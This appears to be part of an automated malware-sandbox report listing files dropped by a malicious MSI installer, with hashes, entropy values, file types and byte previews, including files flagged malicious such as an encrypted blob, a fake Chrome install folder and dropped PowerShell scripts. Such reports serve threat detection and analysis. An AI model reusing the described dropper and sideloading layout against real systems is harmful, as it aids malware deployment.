Preview:	.8K..^...D).cN.P....k..T@..m..Y.@.@[.....n..J...o...x...39.LZ.R]N..$..s..........A.Rt..Qd..b.W..l>..<f.E.6.!2#.p.S.(b.B.s......B.SE...M...7.w.........{N.....L!...].sV/...-8.....Q.:d).u.....A.4...F'E.B../.}.&.i....".....i.q...D.<.....3#...2.><{{..{..n.a......xrq-.......#.......U.R..U ...........S?&.H...s....v.....np.~J6....W-..Sj....T$~..Q.`?5\|N.5.2.?.....BU..@ub.......:.CZ.j...]..jH.....3..U...1&.s9.......s_.d.c.4.X..3......Qk..SC.U...&.9F.t...h.9P......5..^.X.\....<...n....h4.....'./....1M..."?..(...C_..c....wGu.......`l.zd..FA...s.X......d{.\|.1..M6.....[.X%....v..f...o.......L......\|.....M...O.4^{R.{..!y. r7.._@.3.. m.*..].o.....Q....z.Q."(.<e..RyG.l.u.7.:.%Nz....2..`q............T..p....I@.D&.1=niUdal.Zq.....p4.`.Gi.D^a4.....H+!..X!.m.'....`.......I...~.:Y...f].0.y...s.r...G.......IOh...u.D.D6R..9.Sq.R.t7.....p..+.'..q.X....hn.D.Xb/.'..c.e.+..$.)=...V.RvK.t.Q/QM.pE.-..]..\p5.....UL\..a.5...s8R....+..8N..oYRO.A..f.r..TY..d..<.b,......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.99

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37116
Entropy (8bit):	7.994747677689325
Encrypted:	true
SSDEEP:	768:6yYUIATW3mYRfDNRFxvBqmTu9oUADyPH612ojJx2z94XSJj4:ZMvRPBqmqdlovb44XSJ4
MD5:	541703A97409F03643B2F8AE7A534509
SHA1:	BF5A64870DC5C3DFDC2209321BC1E5C62C21FFA8
SHA-256:	0F18A5ADD9085FDBF60909A8CCA9DBE79F143AF2551926D7492192A7501B40DB
SHA-512:	600BD2FEC8FA91CD5D86B1E51A7267D72EDD4DA8A2A2EF32E867319FAF45E3F479A2EBB4D5908DB59901877227EBCA5EDF7F60536966D0989F971898A2F7AF2C
Malicious:	true
Preview:	)3.~{..J.F..P............O...A1X^.{!l..-]C.@..n.g5\.....?...&.J..M.".i..#...Ec..Pl..p.C....'.o ....3-....lo...<M.m....i....~..yF...E....-...~.n.p.B...P..r.&......k..y\|......{..C...\...k..~..~.7...2.X.,.].....D...KR._<8..XD;.........=.L....8rw.7.A.K...R.......^<.B.Yd.z........+7s....j.......MP"..=.}ro.x..-O....7a!.....^Ir.\|.E..=.1....H.....17./.C...$(.....&r]^.G...5"H.,D~..X.K.....%....",..c#.....,N....%.........f.g@.'V.5......a.{.mi;.;..P9...[l.G.W...0.E\|....7.R#.M.+6.Y.Y.0e(..q...oy.....!..1.S..!...p...J..@.....n.]....R..n..EO......#..Pb........ejN....$2EUF....m...2..z.#t..t..)..r.M.7.a.rV....2.o..O`M.U..6...4-...Q.....P.c.N.?....U...o..CW..z..b...c.EM.o..Z&........%..;.i$V....rx.:.......o.:.:.?/)..B..yy5..N)..f..T...,...7.$D....E..Bf...P....&.+.<.....l.....J.>.4..s....b@6Cs\|.W..A.D\..:..]..gSk"3..\.pRrP. ..t...a...e$......T.lB+..b..."e...R.w~...]?j.).35.Wf[.I.V..%.M...0A.A>...n.f....._..._...Z.u.. .W..n..N..A%w.......h....m.!..S/.. ..,MOx

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2790176
Entropy (8bit):	6.548375158128382
Encrypted:	false
SSDEEP:	49152:g5dX0416Gg57xADFc+lhFn/su9wBAxwJfYwzkOkGtI4lecPk:yH6G/DFc+XFEtAxwn0E0
MD5:	1913EFB2223B24D2A47FAD0A1AAD8F19
SHA1:	783D8CD6E58AAB813BE44933F04828152DAD65EA
SHA-256:	796284E881E951ACA4B0ECC4C0ED5587BB3F1FD8B156E88AC9C147BFD49F9BE9
SHA-512:	7A28B582F2FD87FB3A35BA04D3C219C9089DC7AE19C6A9E9B1CBA3325CEA22874EE67A4872E10AD0598028C5BFA94403A2A76FFDFF47A8F7F211D7A9B443027D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........."............................@..............................+.....=4+...`..........................................C".....\|D".d.....&..C....$......j. )...`+.."....".8.....................".(...p...@...........PL".p....5"......................text............................... ..`.rdata..............................@..@.data...p.....#.......".............@....pdata........$.......#.............@..@.gxfg.........%..0....$.............@..@.retplne......%.......$..................tls....1.....%.......$.............@...CPADinfo8.....%.......$.............@..._RDATA........%.......$.............@..@malloc_h......&.......$............. ..`.rsrc....C....&..D....%.............@..@.reloc..."...`+..$...F.............@..B........................................................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_100_percent.pak

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	734375
Entropy (8bit):	7.96368320948898
Encrypted:	false
SSDEEP:	12288:8I3H1fJod/zgsz5B0GDJQrnKs8SNP+QSsSilxNwt0D+cImfd8xEqoO0TehEr2:b3VB4zEEmPLSUNwt0KcV6xEqoO0TO5
MD5:	D7E5189AFFC7F032A6A2D5E4213395C8
SHA1:	DD9A1D0DAD42162953E30D6351A427D6D8665918
SHA-256:	652A51FF9C655862A5C5A876BE3252757D12543ADCE27EAF76C0287C976D2B30
SHA-512:	7EB21092941DBA3CCD1AF9B8B9D884943FDA9DB253FC537A03E297C39E1FE7F98459A0CFCBB25D9C5B7873D2FC42221D038AB2ADA5D687690552A13686024D09
Malicious:	false
Preview:	..........H..."...........^...........~.........p?9...q?....r?....s?z...t?...u?N...v?....w?....x?d...y?...z?!...{?w...\|?...}?,...~?.....?....?8....?.....?....?.....?.....?)....?o....?.....?Q....?.....?.....?.....?c....?.....?.....?Y....?T....?#....?.....?s....?.....?.....?3....?n....?S....?.....?.....?#....?.....?.&...?\|'...?.'...?.@...?.B...?kB...?.B...?.K...?.U...?+i...?.}...?.~...?#....?~....?/....?E....?w....?.....?.....?F....?.....?`....?.....?.....?.....?5....?.....?.....?.....?#....?.....?.....?N....?=....?c....?.....?.!...?.)...?l2...?r;...?.D...?.N...?CW...?'`...?.j...?.s...?:{...?....?3....?x....?`....?.....?H....?.....?.....?.)...?.>...?5Q...?@m...?.....?....?Y....?.....?.....?.....?.....?d....?=(...?.;...?.I...?R_...?vj...?kt...?.{...?.....?D....?.....?.....?T....?Q....?.....?.....?}....?.....?Z....?.....?.....@. ...@J2...@MD...@.P...@.]...@.n...@b....@'....@.....@.....@.....@.....@.....@&....@.....@.....@.....@....%@#...&@....'@....(@....)@....*@....+@....,@. ..-@.&

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23042560
Entropy (8bit):	7.91782807076475
Encrypted:	false
SSDEEP:	393216:uMxtDF4AJI/Tx+lKMXMvVlZ7Xqf1k2wlGmoAzWQgKqBbKBWrSQSC9zbsw8PVk:zDF4AJI/N+Ovtm+20GmomWxKqlczdCVR
MD5:	E036F81A6C03388CA4B38DEB1CD64685
SHA1:	DE13E30008A12B55683B3BEFBFAF8472AA63C6CC
SHA-256:	A397EF0D73B83E3FD67CD29A3BDDDD656566A6DF624942104FCDE115F148E0F6
SHA-512:	F23F93F6D8AA0381C0AA2B500B1BA570F93D5B20C2F5E1087A50B32E05219FED2ED06C78215CCAC8B0F9C94739BB90060FF5ED004CBB18642FB8022C6E60F10C
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........PE..d....._f.........." .........PT.....:.........@...............................G...........`.......................... ................................F.d.....:...............F......................................................@...............................text............................... ..`.data....)...0......................@....bss.........`...........................idata...\..........................@....didata.....P......................@....edata..............................@..@.rdata..E...........................@..@.?rL.....A..........................@..@.pdata.......`......................@..@.'p".........@...................... ..`.4kb.........@......................@....iQD.....w_..`...x_.................`..h.rsrc...d.....F......._.............@..@.reloc........F......._.............@..B....@..@........................................

C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1526048
Entropy (8bit):	6.312728707391181
Encrypted:	false
SSDEEP:	12288:BSPqsQ+j9IS5/7PsMaaCi0aaGzHl1IbgTU2fYKsy4meOFeeo7xh0Qzo8sM0+nk8J:RsQ83Tka6ozFibgI2QKuveo7Lzn
MD5:	FF7F8FE57822B5CB61F519A0298428DE
SHA1:	030B124A5F3BBE550F84F4BACAB03D1F1CAEE516
SHA-256:	5BC0B57B68E514F393946C8A3C775B920C8552887479B3F68251804E0217E0C0
SHA-512:	7D504F7CEFB64DAC9090EF960211AA1D80EC6542B0016682AEEFF33A125D611867342B8A010FD63553F281C10CC3E9B3D6A339F6A0C054E5E272C997406671D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....6e.........."......`.....................@..........................................`.........................................pe..\....e.......0...&........... .. )...`.......Z.......................X..(...p...@...........pl...............................text...f^.......`.................. ..`.rdata..L....p.......d..............@..@.data...@....0......................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h..... ...................... ..`.rsrc....&...0...(..................@..@.reloc.......`......................@..B................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\file.cur

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
Category:	dropped
Size (bytes):	326
Entropy (8bit):	1.2807478913655284
Encrypted:	false
SSDEEP:	3:GlFFXlGFllfl/t+lklel/e/hRD:Gl/Nls62bD
MD5:	DBD44C4AC444D2E0448EC0AD24EC0698
SHA1:	371D786818F0A4242D2FCED0C83412CAA6C17A28
SHA-256:	BF79BFFDBA70F456CB406FD1ECE8652750363B94188510B5D73F36C8EA6E7AE9
SHA-512:	E8025CEB6ECB76B480F279D7E42DEEC8B96C0C1D64CFA3B7AF1E68320281F0F2A9B886AFC16AADE4E2178878970C4909FD650C1DC3C37594D040141ED0AB113F
Malicious:	false
Preview:	...... ......0.......(... ...@.......................................................................................................................................................................................................................................................................................................

C:\ProgramData\Chrome\Application\118.0.5993.120\vk_swiftshader_icd.json

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	5.399649827716212
Encrypted:	false
SSDEEP:	3:JHTHIfUq2//Ts8yUMvpzZDB:JzHi6/Y85uZZDB
MD5:	D5DAF6CE1FEC1E2BD427898D37739D7A
SHA1:	D4840004BC4083E2A28FD0488998D10B70A028A5
SHA-256:	1AA2737EA05FD8D55AF09E89E127112D90DB922710C91E13ABB575EF55A12F89
SHA-512:	AEDA4DC84E37933E3140C8E4674FBBCAB227BC1ABD07F70B73AE0A0478D3079B2896A8B4F61101F4BA98DE82C0E2BC742280E47B895F448724F5DC09501A40AF
Malicious:	false
Preview:	49FQaK68bXmzbwEuYWcMO9orRPKNmunlzvP4TYW+aU+f1C31I3ITCt1XSiJL+dhqNRcJbiXXDozONbbsWMxw

C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	957728
Entropy (8bit):	6.61749314970573
Encrypted:	false
SSDEEP:	24576:Chn0GjuAhKHBEwjUrHyu6Z5W1DYsHq6g3P0zAk74fJQf:ChdMHBEqkHj6Z5W1DYsHq6g3P0zAk7I
MD5:	CFA38CC9320331B3D7A52A58A6AE4577
SHA1:	9BAEDFB077FA677ACE979B46F597DAB16038D684
SHA-256:	F3FA8B4F48697F87D34E8CA0262977FE0A8AE3EB04242E9143B3886E754918A0
SHA-512:	BA2D9AA803C039F323868CDCEC9B532BBC67A7DD87D4156CF732A5CEAEEC3F804B390B1A03362A314147D7BC339D3B4D50C89673288855CAECD6CF78C13C1513
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........." ................................................................;.....`A............................................<!...&..P................q...t.. )......(.......8.......................(.......@............+...............................text...[........................... ..`.rdata..............................@..@.data....L......."..................@....pdata...q.......r..................@..@.gxfg...P).......*...2..............@..@.retplne.............\...................tls.................^..............@..._RDATA...............`..............@..@.rsrc................b..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_7622a0d8a65513c658c06cf38a3f2d3be6c4917_5aba68d6_d3319ea1-6461-4e35-aaf2-38a155886cd1\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9270259921465357
Encrypted:	false
SSDEEP:	192:fZIVJE6o/gn0NmTbc0jP5uZFbqzuiFnZ24lO8q:hG6N/g0NmPc0j7zuiFnY4lO8q
MD5:	9EAC8A9CE6818525E61577EC52C5F82C
SHA1:	7E0D5D842A89C9C7EC165D2AB4A639EDA27E6CF0
SHA-256:	01B859DD53CBE8B957453E4798F474432510E3D143C8AFC12954F82A22A03C95
SHA-512:	F80042471B6B84EEB27BFE4DF99AFEF9ECB811334EB5A4775C33869C7088740FC9E60CF862391168E1DD7DF2E149E3433382EA9B93D328F2C8863D46178D8EB8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.2.4.8.3.7.6.7.5.1.9.2.4.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.2.4.8.3.7.6.7.9.0.9.8.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.3.1.9.e.a.1.-.6.4.6.1.-.4.e.3.5.-.a.a.f.2.-.3.8.a.1.5.5.8.8.6.c.d.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.0.4.3.2.c.0.-.a.a.c.e.-.4.8.2.5.-.8.f.0.5.-.d.5.1.1.6.7.b.d.b.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.e.c.-.0.0.0.1.-.0.0.1.4.-.7.0.6.3.-.2.e.c.3.1.4.b.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.5.2.e.9.b.5.1.a.b.b.4.1.1.1.5.f.0.d.6.c.c.9.f.b.9.5.7.c.f.b.3.0.0.0.0.0.9.0.4.!.0.0.0.0.7.8.3.d.8.c.d.6.e.5.8.a.a.b.8.1.3.b.e.4.4.9.3.3.f.0.4.8.2.8.1.5.2.d.a.d.6.5.e.a.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER704F.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jun 10 09:02:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44036
Entropy (8bit):	2.2943219643540207
Encrypted:	false
SSDEEP:	192:eNiV0v2OJZt3qYKsyGSttAYMX/TObt4Ljk2Kz:9V0ZXt6YKsyGSttAYmTObCs7z
MD5:	4362FD571DA2BB484F359791127752EA
SHA1:	8C66303F391A952265394717513B656EADA5E27B
SHA-256:	797B8E06E5F618C45C9038101140F69CDEB871A6479A5A4B9A1F7559E3C0BF58
SHA-512:	34B3DE8C0E7D2DFBCBB48D52BF42A35F031DE8C7951CD621281C63068C840EDE85647CD4881286CA74BF6A9E45004D648B588E20AD4C097B1AB1779DD0565289
Malicious:	false
Preview:	MDMP..a..... .......7.ff............4...........P...<...........>)..........T.......8...........T.......................................x...............................................................................eJ..............Lw......................T.............ff....P........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER710B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6560
Entropy (8bit):	3.720448172329734
Encrypted:	false
SSDEEP:	192:R6l7wVeJW3z/FYmYepDRC89bheufAI1rm:R6lXJWJYmYQ7h3fAL
MD5:	11BFA05292DA42AF08EB0BC9F2964154
SHA1:	086F0017EAF1B538EE287D621446A3CFFC86D8B5
SHA-256:	B88918F064804A03559DC1CD46D3EA616B8A079E9E73EE661928A2887812BB96
SHA-512:	57F18CD08413E40BECB4157C145747F783175D7F78B0432E2AEDC62F0417255D2EB9E79EEE33C5D82771E6814391058D35A058872FA648B998B2B94E40CE2865
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER712C.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4697
Entropy (8bit):	4.443245466187781
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxJg771I9nMjDWpW8VYYvYm8M4JGBDQmGuFsyq85KhQ12RggUKUDwMiT:uIjfDI7v+7VaJGBDArXhsGggUKULidd
MD5:	25CD92C4C5AF7D852F9F039B837634BC
SHA1:	B7E1EA7E07AA50405EA4E65A02A52635A5FB8AEA
SHA-256:	967D7C6D1722FA9176B1D63BFB60356669611C711BF95DB0D5BC965DEA677A91
SHA-512:	63667A89FADE246B1C13676D254328798ED2062B71D7AE904DF353E298EF4F772AE90E938C031BFE64B1DB3BFD55A09E34268F91D33EA1B40A9409711536019C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="361445" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1388
Entropy (8bit):	5.427382194649454
Encrypted:	false
SSDEEP:	24:3rWSKco4KmZjKbm51s4RPT6moUebIl+mZ9t7J0gt/NK3R8qr+SVbl:bWSU4xymI4RfoUeU+mZ9tK8NWR8qjVbl
MD5:	5C47878F782F08EBA06BFC7E07ED21BB
SHA1:	67CE06F0F0F582D0D38E86FB49FFC6E79E6C0DE1
SHA-256:	8BC1A409FEA57D5080B67EF11ECD9F8499C18D26BEAA5F7D660D7D4F93F0B1CA
SHA-512:	6B5AEA43A2538F08654F3EF385BDDC0E88ACBB2230797FB55F5A2FCDAEB778CA3F0F86463525F8A9163659C10100545FF9B9632EDAA8919C2A79475A0EFC407E
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\ProE6D5.tmp

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.173033892020167
Encrypted:	false
SSDEEP:	3:eJMl7zWv:eJ47zo
MD5:	8D0C91BC45A53C53A595F929977B8B5A
SHA1:	9AB24B23F38E83C1F51DC3B827BDFA447A422656
SHA-256:	BD0392B6AC996038AAC5E6656FB72B863F76261F8FDB5E17281C1B8DB80C2FD6
SHA-512:	E3E3F394838223C2EF5C143D7077752F3C43B2FDC67AA3E2BE1846D21876F54EB0D2B5A07124CD079BAB5BDB048641BE8534345B28FB3908F4B1F61F31F7C52A
Malicious:	false
Preview:	Arquivo ZIP baixado com sucesso!.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyyrzwmd.agm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmo0kdxp.gqk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\pssE6C5.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6668
Entropy (8bit):	3.5127462716425657
Encrypted:	false
SSDEEP:	96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
MD5:	30C30EF2CB47E35101D13402B5661179
SHA1:	25696B2AAB86A9233F19017539E2DD83B2F75D4E
SHA-256:	53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
SHA-512:	882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
Malicious:	true
Preview:	..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\scrE6C2.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	3.651787473058374
Encrypted:	false
SSDEEP:	24:Q9JCfSeKV0rB1lSKfilUx2yaUx6FXSCixpJDJWQ1UMkWkCCNiDo:2JAU0VnSKql42ya4QXSvxpV1HcCNDo
MD5:	616CC5430473EA156466C59CD671E8FE
SHA1:	872FBA3C19C8DBB80D9F2CBBE05B49A84CACF7F9
SHA-256:	86014F3786299BAAE267BDC528B4FF0D4D98DF2FC18DDAA182E75578091F3222
SHA-512:	635DBADDE9464513F1B99F03EE3B88167409CB01C0CA4E8EF5FF50C2DDD20CEA0D1ECF1AA68A3D4F07D48E1F8AAC9845ED6E56F5A8F3E392480E99AFF77C677C
Malicious:	true
